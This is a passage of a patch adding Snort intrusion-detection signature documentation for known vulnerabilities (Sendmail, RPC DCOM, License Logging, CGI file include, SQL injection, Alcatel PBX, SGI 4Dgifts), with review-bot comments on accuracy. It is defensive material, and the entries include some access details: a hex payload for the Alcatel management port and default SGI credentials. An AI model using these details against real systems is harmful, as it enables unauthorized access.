+Affected Systems:
+All systems running CGI applications using phpMyDirectory
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
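Review bot: "may indicate that an exploitation attempt has been attempted" in Summary is circular; "may indicate an exploitation attempt" is enough. Affected Systems "All systems running CGI applications using phpMyDirectory" should be "Systems running phpMyDirectory" together with the affected version range, which this entry never states, so an analyst cannot tell whether a patched install is still at risk. The same generic credential-check paragraph and "ona" typo appear here as in the other remote file include entries in this patch, and Additional References is empty where it should carry the advisory the rule was written from.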
--- /dev/null
+++ b/doc/signatures/2263.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2263
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-07.html
+
+--
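Review bot: the cited reference does not match the vulnerability described. Detailed Information describes the prescan() character-to-integer conversion bug fixed in Sendmail 8.12.9; that is CERT advisory CA-2003-12 (CAN-2003-0161). CA-2003-07 (CAN-2002-1337) is the earlier header address parsing overflow fixed in 8.12.8. Either change the URL to http://www.cert.org/advisories/CA-2003-12.html or, if the rule really targets the 8.12.8 bug, correct the version and description. Also, Affected Systems "All systems using Sendmail" contradicts "prior to version 8.12.9" a few lines above and should be narrowed to match, and "verison" in Corrective Action is a typo for "version".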
--- /dev/null
+++ b/doc/signatures/896.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+896
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
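Review bot: the entry never says which CGI script or URI pattern the rule matches, so Summary ("a known vulnerability in a CGI web application") and Affected Systems ("All systems running CGI applications") give an analyst nothing to triage against; name the script and vendor the rule content tests for, state the affected versions, and put the advisory in the empty Additional References. Typo "ona" in Detailed Information ("running ona web server").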
--- /dev/null
+++ b/doc/signatures/1198.txt
@@ -0,0 +1,77 @@
+Rule:  
+
+--
+Sid:
+1198
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web
+server. Also, the html-rend command can be used to launch denial of
+service attacks. 
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-usr-prop".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default).  Web Publishing need not be enabled for
+this exploit to work.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+-- 
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
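Review bot: punctuation in Ease of Attack inverts the meaning: "Simple. No exploit software required however, an automated tool for scanning exists as does an exploit script." should read "Simple. No exploit software is required; however, an automated scanning tool and an exploit script exist." Impact claims "the html-rend command can be used to launch denial of service attacks" but Detailed Information covers only ?wp-usr-prop; add a sentence on html-rend or move the DoS claim out of this entry. "DOS" in Corrective Action should be "DoS" as used elsewhere in the patch.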
--- /dev/null
+++ b/doc/signatures/3177.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3177
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
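Review bot: "Expoit" in Ease of Attack is a typo for "Exploit". Corrective Action filters only 135, 139 and 445; RPC over HTTP on TCP 593 and NetBIOS on UDP 137 and 138 are also RPC entry points and belong in the same border filter. Attack Scenarios ("a request for a file with an overly long filename via a network share") is the only line that identifies which RPC DCOM issue this rule covers, so Summary should name it and the empty Additional References should cite the Microsoft bulletin the rule was written from.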
--- /dev/null
+++ b/doc/signatures/2570.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2570
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+In particular this rule generates events when a non-standard HTTP
+request is made to a server. Some applications do not handle this
+exception in an acceptable manner and may present an attacker with the
+opportunity to exploit the application and server becasue of this.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+	Seattle Lab Software SLMail Pro 2.0 to 2.0.9 inclusive
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+The use of some proxy servers like Inktomi, may cause this rule to
+generate events.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
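Review bot: "a non-standard HTTP request" in Detailed Information is never defined; say what is non-standard about it (method, version string, header) so an analyst can recognise the traffic in a capture. Affected Systems mixes "All systems using a web server." with "Seattle Lab Software SLMail Pro 2.0 to 2.0.9 inclusive"; if the rule was written for SLMail Pro, say so in Summary and cite the advisory in the empty Additional References, otherwise drop the product line. "becasue" is a typo for "because".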
--- /dev/null
+++ b/doc/signatures/100000152.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000152
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a
+buffer overflow associated with MDaemon IMAP authentication
+processing.
+
+--
+Impact:
+A successful attack can permit a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable
+server.
+
+--
+Detailed Information:
+The MDaemon IMAP server allows basic authentication to be
+exchanged between the client and server.  A vulnerability
+exists allowing an unauthenticated user to cause a buffer
+overflow by crafting an overly long authentication reply
+to a server challenge.  This can allow execution of arbitrary
+code on a vulnerable server.
+
+--
+Affected Systems:
+Alt-N MDaemon prior to 8.0.4
+
+--
+Attack Scenarios:
+An attacker can request IMAP authentication and reply to
+a server challenge with an overly long response, causing
+a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
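Review bot: "Additional References" is missing its colon and the "Other:" line under it is an empty stub; either fill in the Alt-N advisory or remove it. Detailed Information says the server "allows basic authentication to be exchanged" and then describes "an overly long authentication reply to a server challenge"; Basic authentication is a single client-supplied token with no challenge, so the text presumably means the IMAP AUTHENTICATE challenge-response exchange and should name that mechanism so the rule can be checked against it. Ease of Attack "Simple." should say whether public exploit code exists, as the other entries do.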
--- /dev/null
+++ b/doc/signatures/1452.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1452
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
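Review bot: apart from the Sid line, this entry is a verbatim copy of 896.txt earlier in this patch, including the "ona" typo, and likewise never names the CGI script the rule matches. Each doc file should identify the vulnerable program and version so the two rules can be told apart; otherwise an analyst seeing sid 1452 learns nothing about what triggered it.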
--- /dev/null
+++ b/doc/signatures/3108.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3108
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
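Review bot: Affected Systems lists "Microsoft Windows Server 2000"; the product is "Windows 2000 Server". Additional References is empty; the License Logging Service unchecked buffer described here is Microsoft Security Bulletin MS05-010, which should be cited so the "appropriate vendor supplied patches" in Corrective Action can be identified. Ease of Attack "Simple." should say whether exploit code exists, as the other entries do.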
--- /dev/null
+++ b/doc/signatures/3171.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3171
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
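Review bot: this entry is word for word identical to 3177.txt in this patch (same "Expoit" typo, same port list, same empty Additional References), so nothing records what distinguishes rule 3171 from rule 3177. Each file should state which RPC DCOM request or variant its rule matches and cite the corresponding Microsoft bulletin.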
--- /dev/null
+++ b/doc/signatures/1819.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+1819
+
+--
+Summary:
+This event is generated when an attempted connection is observed originating from outside the network to the management port to the Alcatel PBX Phone Switch.
+
+--
+Impact:
+Remote access, denial of service, privilege escalation.  A successful attack may allow remote root access, shutdown of the device, or privlege escalation.
+
+--
+Detailed Information:
+The Alcatel 4000 PBX Phone Switch allows remote management via port 2533. It has been reported that sending a payload of hexidecimal 000143 in the first packet after the three-way handshake to the management port allows access to the device.  There are known default usernames and passwords that, if not changed, will allow control of the device.  Additionally, if a remote user logs in with an account that belongs to the group "other", a shutdown may be performed.  And, improper assignment of permissions on sensitive directories may permit a user to overwrite files and possibly escalate privileges.
+
+--
+Affected Systems:
+Alcatel 4400 PBX running real-time Chorus OS.
+
+--
+Attack Scenarios:
+An attacker may attempt to use this exploit to gain root access, shutdown the system, or escalate privilege from user to root.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block external access to the management port of the switch. 
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11019
+
+--
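Review bot: the model numbers disagree: Detailed Information says "The Alcatel 4000 PBX Phone Switch" while Affected Systems says "Alcatel 4400 PBX"; use the one the referenced Nessus plugin names. Typos: "hexidecimal" (hexadecimal) and "privlege" (privilege); "management port to the Alcatel PBX" in Summary should be "management port of". Corrective Action should also tell the reader to change the documented default usernames and passwords, since Detailed Information says they grant control of the device if left in place.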
--- /dev/null
+++ b/doc/signatures/100000585.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000585
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "db_alter.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "db_alter.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
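Review bot: Affected Systems has no blank line before its "--" separator, unlike every other field in this file. Summary's "may indicate that an exploitation attempt has been attempted" should be "may indicate an exploitation attempt", the third Detailed Information paragraph is the generic credential-check boilerplate that does not describe a remote file include through "admin_template_path", and Additional References is empty; the same corrections apply here as to the other remote file include entries in this patch.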
--- /dev/null
+++ b/doc/signatures/482.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+482
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running Whatsup Gold software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running Whatsup Gold software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS168
+
+--
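Review bot: Detailed Information says the echo request "contains a unique payload in the message request" but never says what it is, so the reader cannot verify the rule or assess false positives; quote the payload bytes the rule matches on. Corrective Action "Block inbound ICMP echo requests." is broader than the finding warrants and breaks routine troubleshooting (which False Positives itself acknowledges); suggest filtering echo requests from untrusted networks at the border instead. "legimately" is a typo for "legitimately", and the contributor address is whitehats.org here but whitehats.com in the other entries.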
--- /dev/null
+++ b/doc/signatures/709.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+709
+
+--
+Summary:
+This event is generated after an attempted login to a telnet server 
+using the username 4Dgifts.
+
+--
+Impact:
+Unauthorized remote access.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to login to a server
+using the username 4Dgifts via Telnet. This is a default account on some
+SGI based machines. The password may also be 4Dgifts or it may not have
+a password assigned.
+
+Repeated events from this rule may indicate a determined effort to guess
+the password for this account.
+
+--
+Affected Systems:
+	SGI Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to connect to a telnet server using the username
+4Dgifts.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the 4Dgifts account.
+
+Use ssh as an alternative to Telnet
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
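Review bot: False Positives "None known." is contradicted by the entry's own description: a legitimate login to an enabled 4Dgifts account fires this rule, so that should be listed. Affected Systems "SGI Telnet servers." is imprecise; the 4Dgifts account is an IRIX default, so "SGI IRIX hosts running telnetd" is the accurate scope. "Use ssh as an alternative to Telnet" is missing its period.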
--- /dev/null
+++ b/doc/signatures/1350.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1350
+
+--
+Summary:
+Attempted python access via web
+
+--
+Impact:
+Attempt to execute a python script on a host.
+
+--
+Detailed Information:
+This is an attempt to execute a python script on a host. Python is a scripting language that is available on a wide variety of platforms. By default Python code runs with full access to all libraries and inbuilt commands available to the language. When combined with the access permissions of the user executing the script, the consequences of running arbitrary code can be devastating
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP transaction that includes a reference to Python in the URI.
+
+--
+Ease of Attack:
+Simple HTTP.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Python may also be requested on a command line should the attacker gain access to the machine. Whenever possible, all python scripts on the host should be written using the restriceted access mode. This forces Python to execute the scripts in a "sandbox" which will disallow unsafe operations in the code.
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1349
+
+--
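Review bot: Corrective Action recommends writing scripts in Python's "restriceted access mode" (typo for "restricted"), and the advice itself is obsolete and unsafe: Python's rexec and Bastion restricted-execution modules were disabled in Python 2.3 because they could be escaped, so the paragraph should instead recommend not exposing the interpreter through the web server at all and running the server as a low-privilege user confined to its document root. "it's designated web root" should be "its". Summary "Attempted python access via web" is a fragment where the other entries use "This event is generated when ..."; Additional References "sid: 1349" should say what rule 1349 covers.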
--- /dev/null
+++ b/doc/signatures/3101.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3101
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
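Review bot: this file is a verbatim duplicate of 3108.txt in this patch, including the "Microsoft Windows Server 2000" product name and the empty Additional References, so nothing records what distinguishes rule 3101 from 3108; state which message or transport each rule covers and cite MS05-010 in both.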
--- /dev/null
+++ b/doc/signatures/100000768.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000768
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "blog" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "blog" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
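Review bot: The third Detailed Information paragraph ("validating the credentials of a client host ...") is generic CGI boilerplate that does not describe an SQL injection through the "blog" parameter of index.php; drop it and keep the two paragraphs that actually describe the injection. Affected Systems gives no Blog CMS version range, so a reader cannot tell which installs are vulnerable. "an exploitation attempt has been attempted" in the Summary is redundant ("that exploitation has been attempted"). Corrective Action could also state the developer-side fix for this class of bug, validating the parameter and passing it to the database through parameterized queries, rather than only "apply patches". Minor layout: no blank line before the "--" separators after Sid, Affected Systems and Contributors, and two empty lines open the file.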
--- /dev/null
+++ b/doc/signatures/897.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+897
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
